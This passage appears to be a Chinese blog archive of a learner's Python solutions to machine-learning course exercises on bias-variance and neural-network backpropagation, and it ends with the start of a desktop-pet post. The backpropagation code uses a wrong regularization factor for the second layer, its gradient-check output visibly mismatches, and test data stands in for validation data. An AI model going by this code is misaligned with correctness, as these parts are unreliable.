print('Cost at theta = [1 1]: {:0.6f}\n(this value should be about 303.993192)'.format(cost))
print('Gradient at theta = [1 1]: {}\n(this value should be about [-15.303016 598.250744]'.format(grad))

Fitting linear regression(拟合线性回归)

将在 trainLinearReg.m 中运行代码,来计算 θ 的最佳值(使用 fmincg 拟合代价函数)

  • 在这一部分中,我们将正则化参数λ设置为“0”(因为我们目前线性回归的实现是试图拟合二维 θ,所以正则化对如此低维的θ没有明显的帮助)
  • 在本练习的后面部分,您将使用带正则化的多项式回归
  • 最后是 ex5.m 脚本还应绘制最佳拟合线,最佳拟合线会告诉我们:由于数据具有非线性模式,因此模型与数据的拟合度不高
  • 虽然可视化显示最佳拟合是调试学习算法的一种可能方法,但可视化数据和模型并不总是容易的,在下一节中,您将实现一个生成学习曲线的函数,该函数可以帮助您调试学习算法,即使数据不容易可视化

实现 trainLinearReg 函数:使用 fmincg 训练线性回归(代价函数为:均方误差)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import numpy as np
from linearCostFunction import linear_cost_function
import scipy.optimize as opt

def train_linear_reg(X,Y,lmd):
init_theta = np.ones(X.shape[1])

def cost_func(t):
return linear_cost_function(X,Y,t,lmd)[0]

def grad_func(t):
return linear_cost_function(X,Y,t,lmd)[1]

theta,*unused = opt.fmin_cg(cost_func,init_theta,grad_func,maxiter=200,disp=False,full_output =True)

return theta
  • 使用 fmincg 进行拟合

具体过程:

1
2
3
4
5
# =========================== 3.训练线性回归 ===========================
lmd = 0
theta = train_linear_reg(np.column_stack((np.ones(m),X)),Y,lmd)
plt.plot(X,np.column_stack((np.ones(m),X)).dot(theta))
plt.show()

绘图结果:

Bias-variance(偏差方差)

机器学习中的一个重要概念是:偏差方差

  • 具有高偏差的模型对于数据来说不够复杂,并且倾向于欠拟合
  • 而具有高方差的模型对训练数据过度拟合

在这部分练习中,您将在学习曲线上绘制训练和测试错误,以诊断 “偏差-方差” 问题

Learning curves A(学习曲线)

现在,您将实现生成学习曲线的代码,这些曲线在调试学习算法时非常有用

  • 为了绘制学习曲线,我们需要使用不同的训练集大小进行训练,得出交叉验证的误差(分别得出训练集,测试集的误差)
  • 要获得不同的训练集大小,应使用原始训练集X的不同子集,可以使用 trainLinearReg 函数来查找θ参数
  • 请注意,lambda 作为参数传递给 learningCurve 函数,在学习θ参数之后,应该计算训练集和交叉验证集的误差

实现 learningCurve 函数:生成学习曲线

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import numpy as np

from linearCostFunction import linear_cost_function # 正则线性回归代价函数(均方误差)
from trainLinearRegression import train_linear_reg # 拟合函数fmincg

def learning_curve(X,Y,Xval,Yval,lmd):
m = X.shape[0]
error_train = np.zeros(m)
error_val = np.zeros(m)

for num in range(m):
theta = train_linear_reg(X[0:num+1,:],Y[0:num+1],lmd) # 使用fmincg训练模型

error_train[num],_ = linear_cost_function(X[0:num+1,:],Y[0:num+1],theta,lmd) # 获取训练集的cost代价
error_val[num],_ = linear_cost_function(Xval,Yval,theta,lmd) # 获取测试集的cost代价

return error_train,error_val
  • zeros():返回来一个给定形状和类型的,用“0”填充的数组

具体过程:

1
2
3
4
5
6
7
8
9
10
11
12
# =========================== 4.线性回归的学习曲线 ==============
lmd = 0 # 不包括正则化项
error_train,error_val = learning_curve(np.column_stack((np.ones(m),X)),Y,
np.column_stack((np.ones(Yval.size),Xval)),Yval,lmd)
plt.figure(2)
plt.plot(range(m),error_train,range(m),error_val)
plt.title('Learning Curve for Linear Regression')
plt.legend(['Train', 'Cross Validation'])
plt.xlabel('Number of Training Examples')
plt.ylabel('Error')
plt.axis([0, 13, 0, 150])
plt.show()
  • 注意:这里直接用“代价”来表示“误差”,其实它们两个本来就是同一个概念(反正它们都是用同一个公式计算出来的)
  • 随着训练集数目m的增大,训练集和测试集的误差都逐渐趋于平缓,证明模型欠拟合

Polynomial regression(多项式回归)

我们的线性模型的问题是,它对数据来说太简单,导致拟合不足(高偏差)

在本练习的这一部分中,您将通过添加更多功能来解决此问题,对于多项式回归,我们的假设有以下形式:

现在,您将使用“更高的x次方”这一方式(第一个公式),在数据集中添加更多功能,这一部分的任务是完成 polyFeatures 中的代码

实现 polyFeatures 函数:将数据映射到多项式特征空间

1
2
3
4
5
6
7
8
9
10
import numpy as np

def ploy_feature(X,p):
m = X.shape[0] # 读取矩阵的长度,("shape[0]"就是读取矩阵第一维度的长度)
X_poly = np.zeros((m,p)) # 添加更多特征

for num in range(1,p+1):
X_poly[:,num-1] = X.flatten() ** num # 添加"次方项"

return X_poly
  • 先对矩阵 X 进行“扩充”,然后提高对应特征的次方(姑且这么理解)

实现 featureNormalize 函数:把数据特征标准化

1
2
3
4
5
6
7
8
import numpy as np

def feature_nomalize(X):
mu = np.mean(X,0) # 计算每一维度的均值
sigma = np.std(X,0,ddof=1) # 计算沿指定轴的标准差
X_norm = (X - mu)/sigma

return X_norm,mu,sigma
  • 从数据集中减去每个特征的平均值
  • 减去平均值后,再将特征值按各自的“标准偏差”进行缩放(除)

具体过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# =============================== 5.投影特征为多项式 ================
p = 8
# 投影和标准化训练集
X_poly = ploy_feature(X,p)
X_poly,mu,sigma = feature_nomalize(X_poly)
X_poly = np.column_stack((np.ones(Y.size),X_poly)) # 将一维数组作为列堆叠到二维数组中

# 投影和标准化验证集
X_poly_val = ploy_feature(Xval,p)
X_poly_val -= mu
X_poly_val /= sigma
X_poly_val = np.column_stack((np.ones(Yval.size),X_poly_val))

# 投影和标准化测试集
X_poly_test = ploy_feature(Xtest,p)
X_poly_test -= mu
X_poly_test /= sigma
X_poly_test = np.column_stack((np.ones(Ytest.size),X_poly_test))

print('Normalized Training Example 1 : \n{}'.format(X_poly[0]))

Learning curves B(学习曲线)

然后我们利用标准化的多项式数据来绘制学习曲线:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# ======================== 6.多项式特征的学习曲线 ===============
lmd = 0
# 绘制拟合曲线
theta = train_linear_reg(X_poly,Y,lmd) # 拟合函数fmincg
x_fit,y_fit = plot_fit(np.min(X),np.max(X),mu,sigma,theta,p) # 绘制多项式拟合图
plt.figure(3)
plt.scatter(X,Y,c='r',marker='x')
plt.plot(x_fit,y_fit)
plt.xlabel('Change in water level (x)')
plt.ylabel('Water folowing out of the dam (y)')
plt.ylim([-60, 40])
plt.title('Polynomial Regression Fit (lambda = {})'.format(lmd))
plt.show()
# 计算代价误差
error_train, error_val = learning_curve(X_poly, Y, X_poly_val, Yval, lmd)
plt.figure(4)
plt.plot(np.arange(m), error_train, np.arange(m), error_val)
plt.title('Polynomial Regression Learning Curve (lambda = {})'.format(lmd))
plt.legend(['Train', 'Cross Validation'])
plt.xlabel('Number of Training Examples')
plt.ylabel('Error')
plt.axis([0, 13, 0, 150])
plt.show()
print('Polynomial Regression (lambda = {})'.format(lmd))
print('# Training Examples\tTrain Error\t\tCross Validation Error')
for i in range(m):
print(' \t{}\t\t{}\t{}'.format(i, error_train[i], error_val[i]))

得到两张图片:(lmd = 0,无正则化)

一,拟合曲线(横坐标:水库水位的变化,纵坐标:从大坝流出的水):

  • 您应该看到多项式拟合能够很好地遵循数据点,因此获得了较低的训练误差
  • 然而,多项式拟合非常复杂,甚至在极端情况下会下降
  • 这是多项式回归模型 过度拟合 训练数据并且不能很好地泛化的指标

二,学习曲线:

  • 注意:蓝线一直在最下面
  • 您可以看到学习曲线在低训练误差低但交叉验证误差高的情况下表现出相同的效果
  • 训练和交叉验证错误之间存在差距,表明存在高方差问题

Adjusting the regularization parameter(调整正则化参数)

在本节中,您将观察正则化参数如何影响正则化多项式回归的偏差方差(主要是通过正则化来消除过拟合的影响)

您现在应该修改 ex5.m 中的 lambda 参数并尝试 λ = [1, 100],对于这些值中的每一个,脚本应该生成适合数据的多项式以及学习曲线

其实就是把上一部分的 “λ=0” 修改为其他值

  • lmd = 1:
  • lmd = 100:

可以对比一下“λ=0”,“λ=1”,“λ=100”,对模型过拟合的影响(明显“λ=1”的模型效果最好)

Selecting λ using a cross validation set(使用交叉验证集选择λ)

从练习的前面部分中,您观察到 λ 的值会显着影响正则化多项式回归,在训练集和交叉验证集上的结果

  • 特别是,没有正则化(λ = 0)的模型很好地拟合了训练集,但不能泛化
  • 相反,正则化过多(λ = 100)的模型不能很好地拟合训练集和测试集
  • 一个好的 λ 选择(λ = 1)可以很好地拟合数据

在本节中,您将实现一个自动方法来选择 λ 参数,具体来说,您将使用交叉验证集来评估每个 λ 值的好坏,在使用交叉验证集选择最佳 λ 值后,我们可以在测试集上评估模型,以估计模型在实际看不见的数据上的表现

您的任务是完成 validationCurve.m 中的代码

  • 具体来说,您应该使用 trainLinearReg 函数使用不同的 λ 值训练模型
  • 并计算训练误差和交叉验证误差
  • 您应该在以下范围内尝试 λ:{0, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10}

实现 validationCurve 函数:生成交叉验证曲线

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import numpy as np
from linearCostFunction import linear_cost_function
from trainLinearRegression import train_linear_reg

def validation_curve(X,Y,Xval,Yval):
lambda_vec = np.array([0., 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10])
error_train = np.zeros(lambda_vec.size)
error_val = np.zeros(lambda_vec.size)

for num in range(lambda_vec.size):
lmd = lambda_vec[num]
theta = train_linear_reg(X,Y,lmd)
error_train[num],_ = linear_cost_function(X,Y,theta,lmd)
error_val[num],_ = linear_cost_function(Xval,Yval,theta,lmd)

return lambda_vec,error_train,error_val

具体过程:

1
2
3
4
5
6
7
8
# ============== 7.通过交叉验证集选择正则项系数lambda =========
lambda_vec,error_train,error_val = validation_curve(X_poly,Y,X_poly_test,Ytest)
plt.figure(5)
plt.plot(lambda_vec, error_train, lambda_vec, error_val)
plt.legend(['Train', 'Test Validation'])
plt.xlabel('lambda')
plt.ylabel('Error')
plt.show()

绘制图像:

  • 我们可以看到 λ 的最佳值在“3”左右(由于数据集的训练和验证拆分的随机性,交叉验证误差有时可能低于训练错误)

PS:lmd = 3:

可以发现:误差的确比 “lmd=1” 还要小

实验介绍

在本练习中,您将实现神经网络的反向传播算法,并将其应用于手写数字识别任务

  • ex4.m - Octave/MATLAB 脚本帮助您完成练习
  • ex4data1.mat - 手写数字训练集
  • ex4weights.mat - 神经网络训练的初始权重
  • submit.m - 提交脚本,将您的解决方案发送到我们的服务器
  • displayData.m - 帮助可视化数据集的函数
  • fmincg.m - 功能最小化例行程序(类似于fminunc)
  • sigmoid.m - Sigmoid 函数(假设陈述)
  • computeNumericalGradient.m - 计算梯度(倒数)的函数
  • checkNNGradients.m - 帮助检查梯度的函数(梯度检测)
  • debugInitializeWeights.m - 初始化权重的函数
  • predict.m - 神经网络预测函数
  • [?] sigmoidGradient.m - 计算sigmoid函数的梯度
  • [?] randInitializeWeights.m - 随机初始化权重
  • [?] nnCostFunction.m - 神经网络代价函数

Neural Networks(神经网络)

在上一个练习中,您实现了神经网络的前馈传播,并使用它使用我们提供的权重预测手写数字

在本练习中,您将实现反向传播算法来学习神经网络的参数,提供的脚本 ex4.m 将帮助你逐步完成这个练习

这与您在上一个练习中使用的数据集相同,ex3data1.mat中有5000个培训示例:

  • 其中每个训练示例是数字的 20x20 像素灰度图像
  • 每个像素由一个浮点数表示,表示该位置的灰度强度
  • 20×20 的像素网格被“展开”成400维向量,这些训练示例中的每一个都成为我们的数据矩阵X中的一行
  • 这给了我们一个 5000×400 的矩阵X,其中每一行都是手写数字图像的训练示例
  • 训练集的第二部分是 5000 维向量 y,其中包含训练集的标签
  • 为了与 Octave/MATLAB 索引更兼容,在没有零索引的情况下,我们将数字0映射到值10,因此,“0”数字标记为“10”,而数字“1”至“9”按其自然顺序标记为“1”至“9”

Visualizing the data(可视化数据)

绘制的过程和上一个实验一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
# ==================== 1.读取数据,并显示随机样例 ==============================
data = scio.loadmat('data\ex4data1.mat') # 使用scipy.io中的函数读取mat文件,data的格式是字典

# 根据关键字,分别获得输入数据和输出的真值
X = data['X']
Y = data['y'].flatten()

# 随机取出其中的100个样本,显示结果
m = X.shape[0] # m:矩阵长度
rand_indices = np.random.permutation(range(m)) # 把[0,m-1]的数据随机排序
selected = X[rand_indices[1:100],:] # 排序后取前100个样本
display_data(selected) # 显示手写数字样例(这里不展示了)
plt.show()

绘制的图像:

Model representation(模型表示)

我们的神经网络它有三层——输入层、隐藏层和输出层

  • 我们的输入是3位数图像的像素值,由于图像的大小为 20×20,这给了我们 400 个输入层单元(不包括总是输出+1的额外偏置单元)
  • 训练数据将由 ex4.m 脚本加载到变量X和y中
  • 我们已经向您提供了一套我们已经培训过的网络参数(θ(1),θ(2))这些都存储在 ex4weights.m 中,并将由 ex4.m 加载

Feedforward and cost function(正向传播和代价函数)

现在你将实现神经网络的代价函数和梯度,首先,在 nnCostFunction.m 中完成代码,神经网络的代价函数是:

这里的 hθ(x) 就可以是逻辑回归中的 Sigmoid 函数(假设陈述),而 θ 就是模型的参数向量(在神经网络中也被称为“权重”)

K=10 是可能标签的总数,注意:虽然原始标签(在变量y中)是 1,2,3……10 为了训练神经网络,我们需要将标签重新编码为只包含值0或1的向量

实现过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# ==================== 2.读取参数,并计算代价 ==================================
weights = scio.loadmat('data\ex4weights.mat')
theta1 = weights['Theta1']
theta2 = weights['Theta2']
nn_paramters = np.concatenate([theta1.flatten(),theta2.flatten()],axis =0) # 把theta1,theta2转化为一维数组后,进行拼接
# 设置参数
input_layer = 400
hidden_layer = 25
out_layer = 10
# 计算代价,无正则项
lmd = 0
cost,grad = nn_cost_function(X,Y,nn_paramters,input_layer,hidden_layer,out_layer,lmd)
print('Cost at parameters (loaded from ex4weights): {:0.6f}\n(This value should be about 0.287629)'.format(cost))
# 计算代价,带入正则项
lmd = 1
cost,grad = nn_cost_function(X,Y,nn_paramters,input_layer,hidden_layer,out_layer,lmd)
print('Cost at parameters (loaded from ex4weights): {:0.6f}\n(This value should be about 0.383770)'.format(cost))
# 验证sigmoid的梯度
g = sigmoid_gradient(np.array([-1, -0.5, 0, 0.5, 1]))
print('Sigmoid gradient evaluated at [-1 -0.5 0 0.5 1]:\n{}'.format(g))
  • flatten():把数组变成一列的形式,等价于 reshape
  • concatenate(a1,a2,…):能够一次完成多个数组的拼接,其中 a1,a2,… 是数组类型的参数

接下来就分析分析最核心的两个函数:sigmoid_gradient,nn_cost_function

  • sigmoid_gradient:计算 sigmoid 函数的梯度(后面会详细分析)
1
2
3
4
5
6
7
8
9
import numpy as np

def sigmoid(z):
g = 1/(1+np.exp(-z)) # 就是Sigmoid函数
return g

def sigmoid_gradient(z):
grad = sigmoid(z) * (1-sigmoid(z))
return grad
  • nn_cost_function:用于计算代价(代价函数-交叉熵)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import numpy as np

from sigmoid import sigmoid
from sigmoid import sigmoid_gradient

def nn_cost_function(X,Y,nn_paramters,input_layer,hidden_layer,out_layer,lmd=0):

theta1 = nn_paramters[:hidden_layer*(input_layer+1)].reshape(hidden_layer,input_layer+1) # 取出theta1
theta2 = nn_paramters[hidden_layer*(input_layer+1):].reshape(out_layer,hidden_layer+1) # 取出theta2
m = Y.size # 获取样本数目

# 输入层的输出等于输入,X增加一列偏置维度
a1 = np.column_stack((np.ones(X.shape[0]),X)) # 5000*401
# 隐藏层的输入和输出
z2 = a1.dot(theta1.T) # 5000*25
a2 = sigmoid(z2)
a2 = np.column_stack((np.ones(a2.shape[0]),a2)) # 5000*26
# 输出层的输入和输出
z3 = a2.dot(theta2.T) # 5000*10
a3 = sigmoid(z3) # 5000*10

# a3[m,k]表示第m个样本预测属于k的概率(因为激活函数是logistic函数)
# 根据Y的值,也转换成和a3相同格式的数组
# yk中每一行只能有一列值为1,yk[m,k]=1表示第m个样本的真实输出是k,其他列为0
yk = np.zeros((m,out_layer))
# 注意:Y中的取值范围是[1,10],而yk中的列下标范围是[0,9]
for num in range(Y.size):
yk[num,Y[num]-1] = 1

# 计算代价,因为输出层的激活函数是logistic函数,所有代价也是以logistic regression代价函数
cost_arr = - yk * np.log(a3) - (1-yk) * np.log(1-a3)
cost = cost_arr.sum()/m + lmd /(2*m) *( (theta1[:,1:] **2).sum() + (theta2[:,1:] **2).sum())

# 使用BP算法计算梯度
delta3 = a3 - yk # 5000*10

delta2 = delta3.dot(theta2) * sigmoid_gradient(np.column_stack((np.ones(z2.shape[0]),z2)))
delta2 = delta2[:,1:] # 5000*25
# theta1的梯度
theta1_grad = np.zeros(theta1.shape) # 25 x 401
theta1_grad = theta1_grad + (delta2.T).dot(a1) # 25*401
nn_parameter1_grad = theta1_grad/m + (lmd/m) * np.column_stack((np.zeros(theta1.shape[0]),theta1[:,1:]))
# theta2的梯度
theta2_grad = np.zeros(theta2.shape) # 10 x 26
theta2_grad = theta2_grad + (delta3.T).dot(a2) # 10*26
nn_parameter2_grad = theta2_grad/m + (1/m) * np.column_stack((np.zeros(theta2.shape[0]),theta2[:,1:]))
# 返回梯度
grad = np.concatenate([nn_parameter1_grad.flatten(),nn_parameter2_grad.flatten()])

return cost,grad
  • 上一个实验是直接导入的 theta1,theta2,而这个实验是用 交叉熵 计算出来的
  • 其中包括了反向传播算法(BP算法)来计算梯度,后面会进行分析
  • PS:高数和线代太菜了,数学上的理解有点困难,所以我就不折磨自己了

Backpropagation(反向传播)

在这部分练习中,您将实现反向传播算法来计算神经网络代价函数的梯度

  • 上一阶段完成的 nnCostFunction.m 会返回一个合适的梯度值(本阶段还会分析一下 nnCostFunction.m 中,使用BP算法计算梯度的那部分)
  • 一旦计算出梯度,就可以通过使用先进的优化器 fmincg(类似于fminunc)最小化代价函数 J(θ),训练神经网络
  • 首先,实现反向传播算法来计算(未规范化)神经网络参数的梯度
  • 在验证了针对非正则化情况的梯度计算是正确的之后,您将实现正则化神经网络的梯度

Sigmoid gradient(Sigmoid 梯度)

为了帮助您开始这部分练习,您将首先实现 sigmoid gradient 函数,用于计算 Sigmoid 梯度

sigmoid 函数的梯度计算公式为:

实现代码如下:

1
2
3
4
5
6
7
8
9
import numpy as np

def sigmoid(z):
g = 1/(1+np.exp(-z)) # 就是Sigmoid函数
return g

def sigmoid_gradient(z):
grad = sigmoid(z) * (1-sigmoid(z)) # g(z)=g(z)(1-g(z))
return grad

Random initialization(随机初始化)

在训练神经网络时,重要的是随机初始化对称性破坏的参数

  • 随机初始化的一个有效策略是在范围内均匀地随机选择 θ(l) 的值(范围是:[−init, init])
  • 您应该使用 init(ε)=0.12.2 ,这个值范围确保参数保持较小,并使学习更有效
  • 你的工作是完成 randInitializeWeights.m 初始化θ的权重

选择 init 的一个有效策略是基于神经网络中的单元数:

实现代码为:

1
2
3
4
5
6
7
8
import numpy as np

# 初始化网络参数
def rand_init_weights(L_in,L_out):
epsilon = np.sqrt(6) / np.sqrt(L_in + L_out)
init_theta = np.random.random((L_out,L_in+1)) * 2*epsilon - epsilon

return init_theta
  • sqrt(x):对“x”开平方
  • random.random(x,y):获取一个范围在 [x,y] 的随机浮点数
1
2
3
4
5
6
7
8
9
# =========================== 3.初始化网络参数 =================================
random_theta1 = rand_init_weights(input_layer,hidden_layer) # 初始化网络参数
random_theta2 = rand_init_weights(hidden_layer,out_layer) # 初始化网络参数
rand_nn_parameters = np.concatenate([random_theta1.flatten(),random_theta2.flatten()]) # 组合后的随机参数(θ集)

lmd =3
check_nn_gradients(lmd) # 梯度检测
debug_cost, _ = nn_cost_function(X,Y,nn_paramters,input_layer,hidden_layer,out_layer,lmd) # 代价函数,用于计算初始代价值
print('Cost at (fixed) debugging parameters (w/ lambda = {}): {:0.6f}\n(for lambda = 3, this value should be about 0.576051)'.format(lmd, debug_cost))

Backpropagation(反向传播的核心算法)

对于反向传播,其实就是进行了如下的一次运算:

  • 计算出各个层的 “δ(l,j)”,代表了第 l 层的第 j 结点的误差

计算案例:

  • 对于最后一层(输出层),δ4 就是 a4(输出层预测的结果)和 y(真实的结果)之间的差值
  • 而对于中间的隐藏层,因为不清楚“预测结果”和“真实结果”的具体值,所以就只能通过以上的公式进行模拟计算

最后,回顾一下“代价函数-交叉熵”的计算过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import numpy as np

from sigmoid import sigmoid
from sigmoid import sigmoid_gradient

def nn_cost_function(X,Y,nn_paramters,input_layer,hidden_layer,out_layer,lmd=0):

theta1 = nn_paramters[:hidden_layer*(input_layer+1)].reshape(hidden_layer,input_layer+1) # 取出theta1
theta2 = nn_paramters[hidden_layer*(input_layer+1):].reshape(out_layer,hidden_layer+1) # 取出theta2
m = Y.size # 获取样本数目

# 输入层的输出等于输入,X增加一列偏置维度
a1 = np.column_stack((np.ones(X.shape[0]),X)) # 5000*401
# 隐藏层的输入和输出
z2 = a1.dot(theta1.T) # 5000*25
a2 = sigmoid(z2)
a2 = np.column_stack((np.ones(a2.shape[0]),a2)) # 5000*26
# 输出层的输入和输出
z3 = a2.dot(theta2.T) # 5000*10
a3 = sigmoid(z3) # 5000*10

# a3[m,k]表示第m个样本预测属于k的概率(因为激活函数是logistic函数)
# 根据Y的值,也转换成和a3相同格式的数组
# yk中每一行只能有一列值为1,yk[m,k]=1表示第m个样本的真实输出是k,其他列为0
yk = np.zeros((m,out_layer))
# 注意:Y中的取值范围是[1,10],而yk中的列下标范围是[0,9]
for num in range(Y.size):
yk[num,Y[num]-1] = 1

# 计算代价,因为输出层的激活函数是logistic函数,所有代价也是以logistic regression代价函数
cost_arr = - yk * np.log(a3) - (1-yk) * np.log(1-a3)
cost = cost_arr.sum()/m + lmd /(2*m) *( (theta1[:,1:] **2).sum() + (theta2[:,1:] **2).sum())

# 使用BP算法计算梯度
delta3 = a3 - yk # 5000*10

delta2 = delta3.dot(theta2) * sigmoid_gradient(np.column_stack((np.ones(z2.shape[0]),z2)))
delta2 = delta2[:,1:] # 5000*25
# theta1的梯度
theta1_grad = np.zeros(theta1.shape) # 25 x 401
theta1_grad = theta1_grad + (delta2.T).dot(a1) # 25*401
nn_parameter1_grad = theta1_grad/m + (lmd/m) * np.column_stack((np.zeros(theta1.shape[0]),theta1[:,1:]))
# theta2的梯度
theta2_grad = np.zeros(theta2.shape) # 10 x 26
theta2_grad = theta2_grad + (delta3.T).dot(a2) # 10*26
nn_parameter2_grad = theta2_grad/m + (1/m) * np.column_stack((np.zeros(theta2.shape[0]),theta2[:,1:]))
# 返回梯度
grad = np.concatenate([nn_parameter1_grad.flatten(),nn_parameter2_grad.flatten()])

return cost,grad

Model Training(模型训练)

代码实现:这里采用 fmincg 来代替梯度下降

1
2
3
4
5
6
7
8
9
10
11
12
13
# ========================== 4.训练NN ==========================================
lmd = 1
def cost_func(p):
return nn_cost_function(X,Y,p,input_layer,hidden_layer,out_layer,lmd)[0]

def grad_func(p):
return nn_cost_function(X,Y,p,input_layer,hidden_layer,out_layer,lmd)[1]

nn_params, *unused = opt.fmin_cg(cost_func, fprime=grad_func, x0=rand_nn_parameters, maxiter=400, disp=True, full_output=True)

# 从返回结果nn_params中获取θ1和θ2(拟合完毕)
theta1 = nn_params[:hidden_layer * (input_layer + 1)].reshape(hidden_layer, input_layer + 1)
theta2 = nn_params[hidden_layer * (input_layer + 1):].reshape(out_layer, hidden_layer + 1)
  • fmincg 是一种高效的迭代器,它的需要主要参数依次为:
    • nn_cost_function 返回的代价
    • nn_cost_function 返回的梯度
    • rand_nn_parameters 中存储的随机参数集

Gradient checking(梯度检测)

梯度检测会估计梯度(导数)值,然后和你程序计算出来的梯度的值进行对比,以判断程序算出的梯度值是否正确

公式为:

实现过程为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import numpy as np
import debugInitializeWeights as diw # 初始化权重的函数
import costFunction as ncf # 计算代价的函数
import computeNumericalGradient as cng # 计算梯度(倒数)的函数

def check_nn_gradients(lmd):
input_layer_size = 3
hidden_layer_size = 5
num_labels = 3
m = 5
# We generatesome 'random' test data
theta1 = diw.debug_initialize_weights(hidden_layer_size, input_layer_size)
theta2 = diw.debug_initialize_weights(num_labels, hidden_layer_size)
# Reusing debugInitializeWeights to genete X
X = diw.debug_initialize_weights(m, input_layer_size - 1)
y = 1 + np.mod(np.arange(1, m + 1), num_labels)
# Unroll parameters
nn_params = np.concatenate([theta1.flatten(), theta2.flatten()])
def cost_func(p):
return ncf.nn_cost_function(X,y,p, input_layer_size, hidden_layer_size, num_labels, lmd)
cost, grad = cost_func(nn_params) # 通过我们的"代价函数cost_func"计算梯度
numgrad = cng.compute_numerial_gradient(cost_func, nn_params) # 直接计算梯度
print(np.c_[grad, numgrad]) # 打印结果
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 初始化权重的函数  
def debug_initialize_weights(fan_out, fan_in):
w = np.zeros((fan_out, 1 + fan_in))
w = np.sin(np.arange(w.size)).reshape(w.shape) / 10
return w
import numpy as np

# 计算梯度(倒数)的函数
def compute_numerial_gradient(cost_func, theta):
numgrad = np.zeros(theta.size)
perturb = np.zeros(theta.size)
e = 1e-4
for p in range(theta.size):
perturb[p] = e
loss1, grad1 = cost_func(theta - perturb)
loss2, grad2 = cost_func(theta + perturb)

numgrad[p] = (loss2 - loss1) / (2 * e)
perturb[p] = 0
return numgrad
  • 在本实验中,我们只对“lmd=3”进行了梯度检测,检测结果如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[[ 0.00901304  0.00901304]
[ 0.05042745 0.05042745]
[ 0.05455088 0.05455088]
[ 0.00852048 0.00852048]
[ 0.01171933 0.01171933]
[-0.05760601 -0.05760601]
[-0.01659828 -0.01659828]
[ 0.03966983 0.03966983]
[ 0.00366088 0.00366088]
[ 0.02471166 0.02471166]
[-0.03245445 -0.03245445]
[-0.05978209 -0.05978209]
[-0.0077655 -0.0077655 ]
[ 0.02526392 0.02526392]
[ 0.05947174 0.05947174]
[ 0.03900152 0.03900152]
[-0.01206378 -0.01206378]
[-0.05761021 -0.05761021]
[-0.04520795 -0.04520795]
[ 0.0087583 0.0087583 ]
[ 0.30228635 0.30228635]
[ 0.16784019 0.20149903]
[ 0.16341919 0.19979109]
[ 0.16182059 0.16746539]
[ 0.13164304 0.10137094]
[ 0.12980928 0.09145231]
[ 0.09959317 0.09959317]
[ 0.06275198 0.08903145]
[ 0.06814118 0.10771551]
[ 0.06010838 0.07659312]
[ 0.03765248 0.01589163]
[ 0.02937856 -0.01062105]
[ 0.09693242 0.09693242]
[ 0.057304 0.07411068]
[ 0.06636988 0.10599418]
[ 0.06353249 0.089544 ]
[ 0.04192228 0.03040615]
[ 0.02820396 -0.01025194]]
  • 左边是用我们的代价函数,计算出来的梯度
  • 右边是用数学方法,计算出来的梯度
  • 通过对比两者的差值,我们可以大体判断一下该代价函数的效果如何

Visualizing the hidden layer(可视化隐藏层)

理解神经网络学习内容的一种方法是可视化隐藏单元捕获的表示

非正式地说,给定一个特定的隐藏单元,可视化其计算内容的一种方法是找到一个将使其激活的输入“x”

实现如下:

1
2
3
4
5
6
7
# ======================= 5.可视化系数和预测 ===================================

display_data(theta1[:, 1:]) # 和之前实验使用的display_data一样
plt.show()

pred = predict_nn(X,theta1, theta2) # 预测神经网络
print('Training set accuracy: {}'.format(np.mean(pred == Y)*100)) # 计算该模型的准确度
  • 实现的原理简单粗暴,直接把输入层输出的激活值放入 display_data 描述数据
  • 注意:上一层输出的激活值,会被当做下一层的输出的数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import matplotlib.pyplot as plt
import numpy as np

def display_data(x):
(m,n) = x.shape
# 设置每个小图例的宽度和高度
width = np.round(np.sqrt(n)).astype(int)
height = (n / width).astype(int)

# 设置图片的行数和列数
rows = np.floor(np.sqrt(m)).astype(int)
cols = np.ceil(m / rows).astype(int)

# 设置图例之间的间隔
pad = 1

# 初始化图像数据
display_array = -np.ones((pad + rows*(height+pad), pad + cols*(width + pad)))

# 把数据按行和列复制进图像中(10x10的表格)
current_image = 0
for j in range(rows):
for i in range(cols):
if current_image > m:
break
max_val = np.max(np.abs(x[current_image,:]))
display_array[pad + j*(height + pad) + np.arange(height),pad + i*(width + pad) + np.arange(width)[:,np.newaxis]] = x[current_image,:].reshape((height,width)) / max_val
current_image += 1
if current_image > m :
break

# 显示图像
plt.figure()
# 设置图像色彩为灰度值,指定图像坐标范围
plt.imshow(display_array,cmap = 'gray',extent =[-1,1,-1,1])
plt.axis('off')
plt.title('Random Seleted Digits')
  • 把输入的图像数据X进行重新排列,显示在一个面板 figurePane 中
  • 面板中有多个小 imge 用来显示每一行数据

描绘结果如下:

桌宠开发Ⅱ

距离上一个版本的桌宠已经1个月了,最近心血来潮,想回顾一下

这两天写这个东西有点上瘾,通过改 BUG,我对 PyQt5 算是熟悉一些了

DesktopPets_v2.0

这次的桌宠迎来大升级,右键菜单功能补全,大大提高了互动性

共添加了3个功能:

  • 天气预报
  • 爬虫
  • 图片盒子

PS:“爬虫”爬取到的图片会直接被“图片盒子”读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
